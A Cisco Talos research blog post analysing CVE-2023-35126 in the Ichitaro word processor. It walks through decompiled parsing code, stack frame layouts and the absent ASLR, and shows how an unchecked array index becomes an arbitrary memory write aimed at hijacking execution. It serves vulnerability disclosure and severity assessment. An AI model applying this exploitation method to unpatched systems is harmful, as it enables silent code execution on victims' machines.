Cisco Talos disclosed several vulnerabilities in JustSystems’ Ichitaro Word Processor last year. These vulnerabilities were complex and were discovered through extensive reverse engineering.
CVE-2023-35126 and its peers (CVE-2023-34366, CVE-2023-38127, and CVE-2023-38128) were each assessed as exploitable with the possibility of achieving arbitrary code execution.
To establish precedence, a complete arbitrary code execution exploit was developed using only limited primitives provided by CVE-2023-35126, demonstrating its severity in contrast with JP CERT’s assessment.
Doing so required an in-depth understanding of the complex file format as well as the internal mechanisms as implemented by Ichitaro, mirroring the exploitation research that a potential malicious adversary would need to perform to achieve the same goal.
The exploit converts an out-of-bounds index into a frame pointer overwrite. After silently executing the payload, the process is repaired, allowing the application to finish loading the rest of the document. Silent continuation of process execution is essential so as not to alert the target victim.
Its payload is distinctly separated from the vulnerability and can be decoded from an arbitrary document stream that is specified at build time. Tools and techniques developed and demonstrated will help us better assess and more quickly understand similar threats in the future.
Stopping short of publishing complete exploit code, we believe it is important to showcase the complexities involved in developing exploits for unusual vulnerabilities and to highlight the importance of exploit mitigations.

The Ichitaro word processing component software from JustSystems, Inc. is part of the company’s larger suite of office products, similar to Microsoft Office 365. While fairly unknown in the rest of the world, it has a large market share in Japan. Regionally popular, but often overlooked, these types of applications have been targets of malicious exploitation campaigns previously. Vulnerability research conducted by Cisco Talos over the past year has uncovered multiple high-severity vulnerabilities in Ichitaro that could allow an adversary to carry out a variety of malicious actions, including arbitrary code execution. JustSystems has patched all the vulnerabilities mentioned in this blog post, all in adherence to Cisco’s third-party vendor vulnerability disclosure policy.

Straightforward fuzzing is mostly ineffective against these types of applications. Complex functionality supported by a complex file format required extensive reverse engineering that yielded a deeper understanding of the inner workings of Ichitaro, which was necessary for effective bug hunting, be it through fuzzing or manual code auditing. These insights help us better assess the severity of vulnerabilities uncovered in the future.

The uncovered vulnerabilities were generally complex and difficult to reach and trigger. For now, we’ll focus on one vulnerability, in particular, TALOS-2023-1825 (CVE-2023-35126). For demonstration purposes, we are using Ichitaro 2023 version 1.0.1.59372. JustSystems patched this vulnerability in security update 2023.10.19. Our emphasis is on the methods employed while performing root cause and exploitability analysis.

Developing memory corruption exploits beyond simple proof of concepts is occasionally time-consuming, and hence is not taken lightly. With the advent of more advanced exploit mitigations, it becomes difficult to assess if a singular vulnerability is exploitable and what its severity is. What helps is exploit equivalence classes. An exploit for a use-after-free vulnerability in a certain context demonstrates that all similar use-after-free vulnerabilities are exploitable. While exploit equivalence classes are established for the most common types of targets (browsers or OS kernels, for example), we have no precedent to fall back on when working with previously unknown types of software.

This is especially important when judging the severity of the vulnerabilities. Our assessment of this vulnerability using CVSS 3.1 scoring was 7.8 (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H), while JP CERT assigned it 3.3 (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L), as they didn’t deem arbitrary code execution possible. This severely underestimates the severity and poses an unnecessary risk to users who might ignore the security updates. By demonstrating and establishing the exploitability of this vulnerability, we aim to rectify the situation and clarify exploitability estimates for the vulnerabilities we uncover in the future.

When exploiting a vulnerability in a common target, well-known techniques can be employed, such as relying on the well-known “addrof/fakeobj” abstraction when exploiting JavaScript engines. However, not all targets allow for the same general techniques. In some cases, interactivity is not possible, or the location of the vulnerability does not allow the adversary to influence enough of the target to allow for exploitability.

We dissected one of the vulnerabilities discovered within Ichitaro that was classified with seemingly limited severity. Leveraging this vulnerability along with side effects of the code that it belongs to allowed us to construct more powerful exploitation primitives which ultimately resulted in full arbitrary code execution. This not only increases our confidence in the assessment of these families of vulnerabilities but documents and demonstrates the building blocks, tools and methodologies necessary to conduct this research.

Format

The main document type supported by the Ichitaro word processor uses the .jtd file extension and is stored as a Microsoft Compound Document. A compound document file contains a hierarchical structure composed of multiple content streams, along with naming information for each, which gives it the near appearance of a filesystem. The primary API is also exposed by Microsoft via COM which, when used to open a document, returns an object that implements the IStorage interface. As a result, the format has been used throughout the years by several Microsoft components, including Microsoft's Office suite, and is extensively documented by Microsoft in [MS-CFB]: Compound File Binary File Format.

Implementers of software utilizing Microsoft's Compound Document format will leverage its file system-like capabilities to store different streams relating to the contents of the document. Thus, when an application is asked to load a document, the application will read a list of directory entries out of the document to extract the stream names. These stream names can then be used to access the contents of the individual streams, which can then be used to load the necessary parts to restore the document.

From this logic of referencing a stream by its name, a pattern can be identified by the reverse engineer and identify where a specific stream is being parsed by a binary. This pattern, combined with the standard API, can enable a reverse engineer to identify the relevant parts of an application that interact with a document.

Utilizing these patterns, TALOS-2023-1825 was discovered and then reported as CVE-2023-35126. When first examining an empty document file, several streams along with their names can be found in the structure storage document's directory. Cross-referencing some of these stream names with the modules loaded in the address space of the binary leads us to a single binary that references the stream name.

Using the default stream names found within a document produced by the application, each of the binaries belonging to the application can be searched to determine which libraries reference the corresponding stream name. The following command demonstrates a search of that kind.

Once the correct binaries have been identified, the strings can simply be cross-referenced to identify a list of candidates that might be used to interact with the corresponding stream. In the following screenshot, each of the stream names is located near to each other. After the list of candidate functions has been identified, that list can then be used to set breakpoints with a debugger and then used to enumerate the functions that are relevant to parsing the document.

Discovery

The discovery of the bug in question starts with identifying the location of the stream names, enumerating instruction references to them, and then finding the common caller that is shared by each reference. This was done in the following screenshot using the IDA Python script which takes the list of selected addresses, fetches each of their executable references, groups each of them into separate sets and then finds the common intersection of all the sets. This results in a single function address being responsible for the selected stream names.

After reviewing the function associated with the discovered address, 0x3BE25803, it appears to reference all of the stream names that were listed out of the empty document and are used as some form of initialization. Upon running the application with a breakpoint set to this address, our debugger will confirm that this code is executed upon opening the document. Examining the backtrace during the same debugging session then gives us a straightforward path to identify how the application parses streams from the document.

The function at 0x3BE25803 then has a single caller at 0x3C1FAF0F that can be navigated to in our disassembler. From this caller, each function that is called by it can be used to identify other places where stream names from the document are referenced. This is a common pattern that can be used to map each stream name to a function that is either responsible for parsing said stream or initializing the scope of variables that are later used when parsing the stream.

int __thiscall object_9c2044::parseStream(DocumentViewStyles,DocumentEditStyles)_3a76be(
        object_9c2044 *this,
        JSVDA::object_OFRM *ap_oframe_0,
        int av_documentType_4,
        int av_flags_8,
        int av_whichStream_c,
        _DWORD *ap_result_10)
{
  lp_this_64 = this;
  p_result_10.ap_unkobject_10 = (int)ap_result_10;
  lp_oframe_6c = ap_oframe_0;
  constructor_3a9de4(&lv_struc_38);
  lv_result_4 = 0;
  sub_3BE29547(lv_feh_60, 0xFFFF, 0);
...
  lv_struc_38.v_documentType_8 = av_documentType_4;
  lv_struc_38.v_initialParsingFlags_c = av_flags_8;
  lv_struc_38.p_owner_24 = lp_this_64;
  lv_struc_38.v_initialField(1)_10 = 1;
  lv_position_7c = 4;
  if ( av_whichStream_c == 1 || av_whichStream_c == 3 || av_whichStream_c == 4 )                // Determine which stream name to use
  {
    v9 = "DocumentViewStyles";
  }
  else
  {
...
    v9 = "DocumentEditStyles";
  }
  v10 = object_OFRM::openStreamByName?_132de4(lp_oframe_6c, v9, 16, &lp_oseg_68);               // Open up a stream by a name.
  if ( v10 != 0x80030002 )
  {
...
    *(_QWORD *)&lp_oframe_70 = 0i64;
    if ( object_OSEG::setCurrentStreamPosition_1329ce(lp_oseg_68, 0, 0, 0, 0) >= 0              // Read a two 16-bit integers for the header
      && object_OSEG::read_ushort_3a7664(lp_oseg_68, &lv_ushort_74)
      && object_OSEG::read_ushort_3a7664(lp_oseg_68, &lv_ushort_78) )
    {
      if ( (unsigned __int16)lv_ushort_74 <= 1u )
      {
        lv_struc_38.vw_version_20 = lv_ushort_74;
        lv_struc_38.vw_used_22 = lv_ushort_78;
...
        v12 = 0;
        for ( i = 4; ; lv_position_7c = i )                                                     // Loop to process contents of stream
        {
          v25 = v12;
          v14 = struc_3a9de4::parseStylesContent_3a7048(&lv_struc_38, lp_oseg_68, i, v12, av_whichStream_c, p_result_10, 0);
          v_result_8 = v14;
          if ( v14 == 0xFFFFFFE8 )
            break;
          if ( v14 != 1 )
            goto return(@edi)_3a78dd;
          i = lv_struc_38.v_header_long_4 + 6 + lv_position_7c;
          v12 = ((unsigned int)lv_struc_38.v_header_long_4 + 6i64 + __PAIR64__(v25, lv_position_7c)) >> 32;
        }
        v_result_8 = 1;
      }
...
  return v_result_7;
}

The listing shows the beginning of the function at 0x3C1FAF0F with the name object_9c2044::parseStream(DocumentViewStyles,DocumentEditStyles)_3a76be. This function references the DocumentViewStyles stream. Specifically, both the DocumentViewStyles and DocumentEditStyles strings are referenced next to each other separated by only a conditional. Hence, both streams likely use the same implementation to parse their contents and a parameter is used to distinguish between them. At the bottom of the same function is a loop that is likely used to process the variable-length contents of the streams. If we examine the function being called for each iteration of this loop, we will encounter the following function, which is of reasonable complexity and appears to process some number of record types using a 16-bit integer as their key. The shape of this function is shown in the following screenshot.

The following list is a decompilation of the function from the previous screenshot that parses record types out of the stream. Exploring the different cases implemented by this method shows that it is responsible for parsing around 10 different record types. Most of the functions used to parse each individual record types are prefaced with a function that ensures that the necessary fields are constructed and initialized before processing its corresponding record. This implies that the conditional allocations involved with these fields can only be used once per instance of the document, and will need to already have been called to avoid the unpredictability of the data that is left on the stack during the exploitation process.

int __thiscall struc_3a9de4::parseStylesContent_3a7048(
        struc_3a9de4 *this,
        JSVDA::object_OSEG *ap_oseg_0,
        int av_position(lo)_4,
        int av_position(hi)_8,
        int av_currentStreamState?_c,
        frame_3a7048_arg_10 ap_unkobjectunion_10,
        frame_3a7048_arg_14 ap_nullunion_14)
{
  lv_result_4 = 0;
  p_oseg_0 = ap_oseg_0;
...
  v_documentType_8 = this->v_documentType_8;
  v_boxHeaderResult_0 = struc_3a9de4::readBoxHeader?_3a6fae(this, ap_oseg_0);
  if ( v_boxHeaderResult_0 != 31 )
  {
...
    vw_header_word_0 = (unsigned __int16)this->vw_header_word_0;                        // Check first 16-bit word from stream
    p_owner_24 = this->p_owner_24;
    lp_owner_8 = p_owner_24;
    if ( vw_header_word_0 > 0x2003 )
    {
      v_wordsub(2004)_0 = vw_header_word_0 - 0x2004;
      if ( v_wordsub(2004)_0 )
      {
        v_word(2005)_0 = v_wordsub(2004)_0 - 1;
        if ( !v_word(2005)_0 )
        {
          if ( av_currentStreamState?_c != 5 ) {                                        // Check for record type 0x2005
            struc_3a9de4::ensureFieldObjectsConstructed??_3a6d8b(this, 0);
            p_styleObject_3a712c = struc_3a9de4::readStyleType(2005)_3a6bec(this, p_oseg_0, this->v_header_long_4, Av_parsingFlagField_8 == 3);
            goto returning(@eax)_endrecord_3a736f;
          }
          goto returning(1)_endrecord_3a70f9;
        }
        v_wordsub(2006)_0 = v_word(2005)_0 - 1;
        if ( v_wordsub(2006)_0 )
        {
          v_word(2007)_0 = v_wordsub(2006)_0 - 1;
          if ( v_word(2007)_0 )
          {
            v_word(2008)_0 = v_word(2007)_0 - 1;
            if ( !v_word(2008)_0 )
            {
...
              if ( p_object_60 )
              {

LABEL_93:
                p_styleObject_3a712c = object_9d0d30::readStyleType(2008)_391906(       // Process record type 0x2008
                                         p_object_60,
                                         p_oseg_0,
                                         this->v_header_long_4,
                                         Av_parsingFlagField_8,
                                         this->v_documentType_8,
                                         ap_unkobjectunion_10.ap_unkobject_10,
                                         &lv_result_4);
                goto returning(@eax)_endrecord_3a736f;
              }
              goto returning(@esi)_endrecord_3a7625;
            }
...
        }
...
      }
...
      return p_result_3a705e;
    }
...
    struc_3a9de4::ensureFieldObjectsConstructed??_3a6d8b(this, 0);
    object_9e5ffc = ap_nullunion_14.object_9e5ffc;
    goto readStyleType(1000)_3a7365;
  }
  return 0xFFFFFFE8;
}

The first set of conditions that are listed in the decompilation leads to the parser for record type 0x2005. The second case, as per the decompilation, is used to parse record type 0x2008. It is this record type that contains the entirety of the vulnerability leveraged by this document.

The next listing shows the parser for record type 0x2008. In it, we can immediately spot a static-sized array named lv_objects(6)_6c due to the loop that initializes it. After a closer look at the references to this array, the function uses an index, lvw_index_70, to access elements of the lv_objects(6)_6c array. This index is directly read from the file as one of the output parameters of the arena_reader::read_header_779756 method without verifying it is within bounds of the array. Immediately after the index is used fetch an item from the array, the item is then written to. Thus, this out-of-bounds index is made significantly more useful due to it being used for writing into a constant-sized array allocated in the frame.

int __thiscall object_9d0d30::readStyleType(2008)_391906(
        object_9d0d30 *this,
        JSVDA::object_OSEG *ap_oseg_0,
        int av_size_4,
        int av_someFlag_8,
        int av_documentType_c,
        int ap_nullobject_10,
        int *ap_unusedResult_14)
{
...
  v34 = 0;
  p_object_14 = this->v_data_20.p_object_14;
...
  v9 = JSFC::malloc_181e(sizeof(object_9d14a0));
...
  if ( v9 )
    v10 = object_9d14a0::constructor_38cb12(v9, this->v_data_20.p_object(9c2044)_c, this);
...
  this->v_data_20.p_object_14 = v10;
  object_9d14a0::addSixObjects_38cb7d(v10);
  for ( i = 0; i < 6; ++i )                                                                     // Loop for an array with a static length
    lv_objects(6)_6c[i] = object_9d14a0::getPropertyForItemAtIndex_37a71d(this->v_data_20.p_object_14, i);
...
  while ( lvw_case_84 != 0xFFFF )                                                               // Keep reading records until 0xFFFF
  {
    switch ( lvw_case_84 )
    {
      case 0u:                                                                                  // Case 0-4,6,8,9 are similar.
        if ( !arena_reader::read_header_779756(&lv_triple_80, &lv_size_74, &lvw_index_70) )
          goto LABEL_47;
        LOWORD(lv_size_74) = lv_size_74 - 2;
        if ( !arena_reader::read_ushort_779780(&lv_triple_80, &v25) )
          goto LABEL_47;
        lv_objects(6)_6c[lvw_index_70]->v_data_20.v_typeField(0)_14 = v25;                      // lvw_index_70 is unbounded
        goto LABEL_51;
...
      case 5u:                                                                                  // Case 5
        if ( !arena_reader::read_header_779756(&lv_triple_80, &lv_size_74, &lvw_index_70) )
          goto LABEL_47;
        LOWORD(lv_size_74) = lv_size_74 - 2;
...
        wstringtoggle_7fb182::initialize_7fb182(&v15, lv_wstring(28)_54);
        LOBYTE(v34) = 0;
        object_9d15a0::moveinto_field(20,2c)_6c0780(lv_objects(6)_6c[lvw_index_70], v15);       // lvw_index_70 is unbounded
        goto LABEL_51;
...
      case 7u:                                                                                  // Case 7
        if ( !arena_reader::read_header_779756(&lv_triple_80, &lv_size_74, &lvw_index_70) )
          goto LABEL_47;
        lv_size_74 += 0xFFFC;
        if ( !arena_reader::read_int_6b5bc1(&lv_triple_80, &v17) )
          goto LABEL_47;
        lv_objects(6)_6c[lvw_index_70]->v_data_20.v_typeField(7)_38 = v17;                      // lvw_index_70 is unbounded
        goto LABEL_51;
...
      default:
        if ( !arena_reader::read_ushort_779780(&lv_triple_80, &lv_size_74) )
          goto LABEL_47;
        break;
    }
    while ( lv_size_74 )
    {
      if ( !arena_reader::read_byte_405b6c(&lv_triple_80, &lvb_85) )
        goto LABEL_47;
      lv_size_74 += 0xFFFF;
    }
...
  }
...
}

The index is used to refer to the correct element in an array of pointers to an object. The object used for each element of the array, object_9d15a0, is 0x68 bytes in size and is primarily composed of integer fields that are used to store data read from the current stream. Thus, the vulnerability enables us to write data to one of the object’s fields depending on which case was read during parsing. Examining each of the cases individually, there are three ways in which the implementation may be written to object_9d15a0.

The first class involves dereferencing a pointer from the indexed object and then writing a 16-bit integer zero-extended to 32 bits to the target of the pointer.

The second class also involves dereferencing a pointer but allows us to write a 32-bit integer to the pointer's target.

The third class is slightly more complex, but it appears to write a reference to a short object of some kind that contains an integer that can be set to 1 or 2, and a pointer that can be freed depending on the value of that integer. Of these three classes, the 32-bit integer write seems to be the most useful unless we plan to write a length where the high 16-bits are always cleared.

After the pointer for any of these classes has been dereferenced, the integer that is decoded from the stream is written to a field within the dereferenced object. Examining each individually shows us exactly which field of the object will be written to. It appears that depending on the case that we choose, our decoded integer will end up being written within the range +0x34 to +0x60 of the object. As only the 32-bit integer and possibly the short object cases appear to be of use, we will take note of the field they write to, and use that field to locate something useful to overwrite. Specifically, we take note that the short object type is using case 0x5 and will result in writing to offset +0x4c, whereas the 32-bit integer type for case 0x7 will end up writing to offset +0x58.

Python>struc.by('object_9d15a0').members
<class 'structure' name='object_9d15a0' size=0x68>
[0]  0+0x4                     int 'p_vftable_0' (<class 'int'>, 4)     # [vftable] 0x3c4515a0
[1]  4+0x1c JSFC::CCmdTarget::data 'v_data_4'    <class 'structure' name='JSFC::CCmdTarget::data' offset=0x4 size=0x1c>
[2] 20+0x48    object_9d15a0::data 'v_data_20'   <class 'structure' name='object_9d15a0::data' offset=0x20 size=0x48>

Python>struc.by('object_9d15a0').members[2].type.members
<class 'structure' name='object_9d15a0::data' offset=0x20 size=0x48>
[0]  20+0x4                  int 'p_vftable_0'             (<class 'int'>, 4)
[1]  24+0x4                  int 'p_vftable_4'             (<class 'int'>, 4)
[2]  28+0x2              __int16 'field_8'                 (<class 'int'>, 2)
[3]  2a+0x2              __int16 'field_A'                 (<class 'int'>, 2)
[4]  2c+0x4                  int 'field_C'                 (<class 'int'>, 4)
[5]  30+0x4       object_9d0d30* 'p_owner_10'              (<class 'type'>, 4)
[6]  34+0x4                  int 'v_typeField(0)_14'       (<class 'int'>, 4)   # [styleType2008] 0x0
[7]  38+0x4                  int 'v_typeField(1)_18'       (<class 'int'>, 4)   # [styleType2008] 0x1
[8]  3c+0x4                  int 'v_typeField(2)_1c'       (<class 'int'>, 4)   # [styleType2008] 0x2
[9]  40+0x4                  int 'v_typeField(3)_20'       (<class 'int'>, 4)   # [styleType2008] 0x3
[10] 44+0x4                  int 'v_typeField(9)_24'       (<class 'int'>, 4)   # [styleType2008] 9
[11] 48+0x4                  int 'v_typeField(4)_28'       (<class 'int'>, 4)   # [styleType2008] 0x4
[12] 4c+0x8 wstringtoggle_7fb182 'v_typeFieldString(5)_2c' <class 'structure' name='wstringtoggle_7fb182' offset=0x4c size=0x8> # [styleType2008] 5
[13] 54+0x4                  int 'v_typeField(6)_34'       (<class 'int'>, 4)   # [styleType2008] 0x6
[14] 58+0x4                  int 'v_typeField(7)_38'       (<class 'int'>, 4)   # {'styleType2008': 7, 'note': 'writes 4b integer'}
[15] 5c+0x4                  int 'v_typeField(8)_3c'       (<class 'int'>, 4)   # [styleType2008] 0x8
[16] 60+0x4                  int 'field_40'                (<class 'int'>, 4)
[17] 64+0x4     JSFC::SomeString 'v_string_44'             <class 'structure' name='JSFC::SomeString' offset=0x64 size=0x4>

Referencing the listing, each of the fields that are being written to are named as v_typeField(case)_offset. When parsing the 0x2008 record type, the integer decoded out of the stream will be written to either one of these fields. It is worth noting that the field v_typeField(7)_38 for case 7 will allow us to write a full 32-bit integer, the field v_typeFieldString(5)_2c for case 5 will allow us to write a pointer to a 16-bit character string, and the other fields will allow us to write a 32-bit integer zero-extended from a 16-bit integer. The only thing left to do is to write a proof-of-concept demonstrating the out-of-bounds index being used to dereference a pointer, and then write to our desired field.

Mitigations

After identifying the vulnerability, we can immediately check the mitigations that have been applied to the target to get a better idea of what might be a hindrance to the exploitation of our write candidates. By examining the modules in the address space, we can see that DEP (W^X) is enabled, but ASLR is not for some of the listed modules. This greatly simplifies things, since our vulnerability allows us to overwrite practically anything within these listed modules. Because of this, we won't need to do much else other than write to a known address to hijack execution.

In the following screenshot, we also notice that the target uses frame pointers and stack canaries to protect them from being overwritten. This won't directly affect the exploitation of this vulnerability but could affect any code we might end up re-purposing once we earn the ability to execute code.

Leveraging the vulnerability

Now that we've identified anything that might add to the complexity of our goals, we can revisit the vulnerability and expand on it. The first thing we'll need to do is to control the pointer that will be dereferenced. Our pointer will be located on the stack, so we'll need to get data that is parsed from the stream by the application to be located on the stack so that we can use our out-of-bounds index to dereference it.

Examining the scope of the vulnerability shows that it has a call stack depth of three, from when the document starts to parse the streams from the document at object_9c2044::method_processStreams_77af0f. This depth represents the part of the application where we control input and contains the logic by which we can influence the application with our document. Any data that is read from the file will only be available from one of the methods within this scope.

int __thiscall object_9c2044::method_processStreams_77af0f(
        object_9c2044 *this,
        JSVDA::object_OFRM *ap_oframe_0,
        unsigned int av_documentType_4,
        unsigned int av_flags_8,
        struc_79aa9a *ap_stackobject_c,
        int ap_null_10)
{
...
  lp_oframe_230 = ap_oframe_0;
  lp_stackObject_234 = ap_stackobject_c;
...
  if ( !lv_struc_24c.lv_flags_10 )
  {
LABEL_42:
    lv_struc_24c.field_14 = av_flags_8 & 0x800;
    v10 = object_9c2044::parseStream(DocumentViewStyles)_3a790a(this, ap_oframe_0, av_documentType_4, av_flags_8);          // "DocumentViewStyles"
    if ( v10 == 1 )
    {
      v10 = object_9c2044::parseStream(DocumentEditStyles)_3a6cb2(this, lp_oframe_230, av_documentType_4, av_flags_8);      // "DocumentEditStyles"
      if ( v10 == 1 )
      {
        v10 = object_10cbd2::processSomeStreams_778971(
                this->v_data_290.p_object_48,
                lp_oframe_230,
                av_documentType_4,
                av_flags_8);
        if ( v10 == 1 )
        {
...
          v10 = object_9c2044::decode_substream(Toolbox)_3a6a7b(this, lp_oframe_230);                                       // "Toolbox"
          if ( v10 == 1 )
          {
            v10 = object_9c2044::decode_stream(DocumentMacro)_3a680a(this, lp_oframe_230, av_documentType_4);               // "DocumentMacro"
            if ( v10 == 1 )
            {
              v10 = sub_3BE25803(this, lp_oframe_230, av_flags_8);
              if ( v10 == 1 )
              {
                v10 = JSVDA::object_OFRM::decode_stream(Vision_Sidenote)_77310e(this, lp_oframe_230);                       // "Vision_Sidenote"
                if ( v10 == 1 )
                {
                  v10 = object_9c2044::decode_stream(MergeDataName)_3a55d3(this, lp_oframe_230);                            // "MergeDataName"
                  if ( v10 == 1 )
                  {
                    v10 = object_9c2044::decode_stream(HtmlAdditionalData)_3a5445(this, lp_oframe_230, av_documentType_4, lp_stackObject_234, 0);
...
                  }
                }
              }
            }
          }
        }
      }
    }
...
  }
  return v10;
}

/** Functions used to parse both the "DocumentViewStyles" and "DocumentEditStyles" streams. **/
int __thiscall object_9c2044::parseStream(DocumentViewStyles)_3a790a(object_9c2044 *this, JSVDA::object_OFRM *ap_oframe_0, int av_documentType_4, int av_flags_8)
{
  object_9c2d50::field_397a8d::clear_3a7b8b(this->v_data_290.p_object_84->v_data_4.p_streamContentsField_1dc);
  this->v_data_290.p_object_84->v_data_4.p_streamContentsField_1dc = 0;
  return object_9c2044::parseStream(DocumentViewStyles,DocumentEditStyles)_3a76be(this, ap_oframe_0, av_documentType_4, av_flags_8, 1, 0);
}

int __thiscall object_9c2044::parseStream(DocumentEditStyles)_3a6cb2(object_9c2044 *this, JSVDA::object_OFRM *ap_oframe_0, int av_documentType_4, int av_flags_8)
{
  object_9c2d50::field_397a8d::clear_3a7b8b(this->v_data_290.p_object_84->v_data_4.p_streamContentsField_1d8);
  this->v_data_290.p_object_84->v_data_4.p_streamContentsField_1d8 = 0;
  return object_9c2044::parseStream(DocumentViewStyles,DocumentEditStyles)_3a76be(this, ap_oframe_0, av_documentType_4, av_flags_8, 2, 0);
}

From a cursory glance at the object_9c2044::method_processStreams_77af0f method in the listing, it seems that the stream of interest is one of the first two streams that are being parsed by the application. This implies that there is not much logic that is executed between the document being opened and our vulnerability being reached. To influence the state of the application before our vulnerability, we are limited only to the logic related to parsing the streams containing the document styles. If we end up hijacking execution at any time within the vulnerability's scope, we'll need some way of maintaining control afterward to modify the permissions of whatever page we plan on loading.

Exploring some of the other stream parsers seems to show that virtual methods are called upon by some objects to read from the stream. These exist in a writable part of some of the available modules, so we can likely overwrite them globally if we determine it necessary. However, this would also result in the "breaking" of that functionality for the entire application since the virtual method would not be usable anymore.

Since our write is happening at the beginning of the application parsing the document, anything we overwrite would have to be used by the one or two streams that read data from the file. Performing a rudimentary query on the parsers for the record types belonging to both the DocumentViewStyles and DocumentEditStyles streams show that nothing is being read dynamically into the heap or any other means, and so we'll have to use our vulnerability to write the entire payload and anything else we might need.

Python> func.frame(0x3BE11906).members
<class 'structure' name='$ F3BE11906' offset=-0xcc size=0xe4>
     -cc+0x10                                          [None, 16]
[0]  -bc+0x4                  int 'var_B4'             (<class 'int'>, 4)
[1]  -b8+0x4                  int 'var_B0'             (<class 'int'>, 4)
[2]  -b4+0x2              __int16 'var_AC'             (<class 'int'>, 2)
...
[13] -8d+0x1                 char 'lvb_85'             (<class 'int'>, 1)
[14] -8c+0x2              __int16 'lvw_case_84'        (<class 'int'>, 2)
     -8a+0x2                                           [None, 2]
[15] -88+0xc         arena_reader 'lv_triple_80'       <class 'structure' name='arena_reader' offset=-0x88 size=0xc>
[16] -7c+0x4                  int 'lv_size_74'         (<class 'int'>, 4)
[17] -78+0x2              __int16 'lvw_index_70'       (<class 'int'>, 2)
[18] -76+0x2              __int16 'var_6E'             (<class 'int'>, 2)
[19] -74+0x18   object_9d15a0*[6] 'lv_objects(6)_6c'   [(<class 'type'>, 4), 6]
[20] -5c+0x50         wchar_t[40] 'lv_wstring(28)_54'  [(<class 'int'>, 2), 40]
[21]  -c+0x4                  int 'var_4'              (<class 'int'>, 4)
[22]  -8+0x4              char[4] ' s'                 [(<class 'int'>, 1), 4]
[23]  -4+0x4              char[4] ' r'                 [(<class 'int'>, 1), 4]
[24]   0+0x4  JSVDA::object_OSEG* 'ap_oseg_0'          (<class 'type'>, 4)
[25]   4+0x4                  int 'av_size_4'          (<class 'int'>, 4)
[26]   8+0x4                  int 'av_someFlag_8'      (<class 'int'>, 4)
[27]   c+0x4                  int 'av_documentType_c'  (<class 'int'>, 4)
[28]  10+0x4                  int 'ap_nullobject_10'   (<class 'int'>, 4)
[29]  14+0x4                 int* 'ap_unusedResult_14' (<class 'type'>, 4)

This listing shows the layout of the entire frame belonging to the object_9d0d30::readStyleType(2008)_391906 method which contains our vulnerability. In this layout, the lv_objects(6)_6c field contains the six-element array of pointers that our index is used with. This means that we'll be dereferencing a pointer relative to this array. Right after this array is a buffer before the canary protecting the caller's frame pointer and address. If we cross-reference this field, we can see that it is referenced during the processing of case 5.

In case 5, the implementation will read two 16-bit fields, containing the index and size. This size is checked against the 0x66 constant before it is used to read an array of 16-bit integers into the referenced buffer of 0x50 bytes in size. After being checked against 0x66, the size is aligned to a multiple of 2 and then verified that it is less than 0x42. If the length verification fails this time, the __report_rangecheckfailure function will immediately terminate execution.

If this check is passed, the array that was read will be used to construct the prior-mentioned short object and then written to the array of six objects that are located on the stack. There is no other code within this function that uses this 16-bit integer array, and since it is used to temporarily store the array of 16-bit integers read from the file, we can reuse its space to store any pointers that we will want to use during exploitation.

Vulnerability's capabilities

Moving back to the proof-of-concept, we'll need to combine the two mentioned cases for record 0x2008, so that we can emit the necessary records to write to an arbitrary address. Case 5, allows us to store an array of 16-bit integers into a buffer, so we will use this to store the pointers that will be dereferenced to the lv_wstring(28)_54 field. Case 7, allows us to specify an out-of-bounds index and so we can specify an index that will dereference a pointer from the lv_wstring(28)_54 field that we loaded with case 5. The combination of these two types allows us to write a controlled 32-bit integer to a controlled address.

Due to the limit of our scope, with the vulnerability being at the very beginning of the document being parsed, we are restricted in that we must use the vulnerability to load the entirety of our payload within the application’s address space. This implies that we’ll need to promote the primitive 32-bit write to an arbitrary address into a primitive that allows us to write an arbitrary amount of data to an arbitrary address. If we use the same technique of one record with type 5 followed by a record of type 7, this would result in a size cost of six bytes composed of the type, size, and index, followed by 32 bits for the integer or the address (10 bytes in total). Since both record types are being used, the overhead would be 20 bytes for every 32-bit integer that we wish to write. Fortunately, this overhead can be reduced due to there being more space within the lv_wstring(28)_54 field that we can use to store each address that will need to be written to.

The upper bound of the size before __report_rangecheckfailure is 0x42 bytes and we will need to include extra space for the null-terminator at the beginning of the string. This will allow us to load 15 addresses for every type 5 record using 0x46 bytes. Then using a type 7 record for each integer to write will result in the cost being 10 bytes per 32-bit integer, an improvement. To accommodate an amount of data that is not a multiple of 4, we simply write an unaligned 32-bit integer at the end for the extra bytes and proceed to fill the space before as described. After implementing these abstractions in our exploit, the next step is to figure out what to hijack.

Hijacking execution

As we can write anywhere within the address space, we could overwrite some global pointers to hijack execution. But, if we review the code within and around our immediate scope, the only virtual methods that are available to hijack are only used for reading the contents of the current stream being parsed. If we examine the contents of these objects, it turns out that there is absolutely nothing inside them that contains useful data or even pointers that may allow us to corrupt other parts of the application. As such, we need to hope that something we can influence with the contents of the stream resides at a predictable place in memory.

Python> struc.by('JSVDA::object_OSEG')
<class 'structure' name='JSVDA::object_OSEG' size=0x10>         # [alloc.tag] OSEG

Python> struc.by('JSVDA::object_OSEG').members
<class 'structure' name='JSVDA::object_OSEG' size=0x10>         # [alloc.tag] OSEG
[0]  0+0x4               int 'p_vftable_0' (<class 'int'>, 4)   # [vftable] 0x27818738
[1]  4+0xc object_OSEG::data 'v_data_4'    <class 'structure' name='object_OSEG::data' offset=0x4 size=0xc>

Python> struc.by('JSVDA::object_OSEG').members[1].type.members
<class 'structure' name='object_OSEG::data' offset=0x4 size=0xc>
[0]  4+0x4     int 'v_bucketIndex_0'    (<class 'int'>, 4)
[1]  8+0x8 __int64 'v_currentOffset?_4' (<class 'int'>, 8)

This listing shows the layout of the object used to read data from the stream. As listed, the object has only one field which is the index or handle for the document. Due to the lack of ASLR, we could overwrite one of the virtual method tables that are referenced by this object. However, the only methods that the application uses from this object are used by the same record implementation to parse it. Anything we overwrite will immediately break this object and prevent the application from loading any more data from the document.

Examining the stack also shows that there are not any useful pointers other than one to a global object which is initialized statically and is thus scoped to the application. However, there are frame pointers on the stack that may be used. We will only need to discover a relative reference to one to use it. Due to the nature of how code is executed, we can assume that everything within our vulnerability’s context originates from a caller farther up the stack. Hence, it is either copied out of the heap belonging to another component, entered our scope via some global state, or enters scope as a parameter. We will also need to keep in mind that we are only able to write a 32-bit integer at +0x58, 16-bit integers between +0x34 and +0x60, or a pointer to a structure containing a string at +0x4C relative to our chosen pointer. Hence, we will need to search to find a reference to a frame that allows us to hijack execution within these constraints.

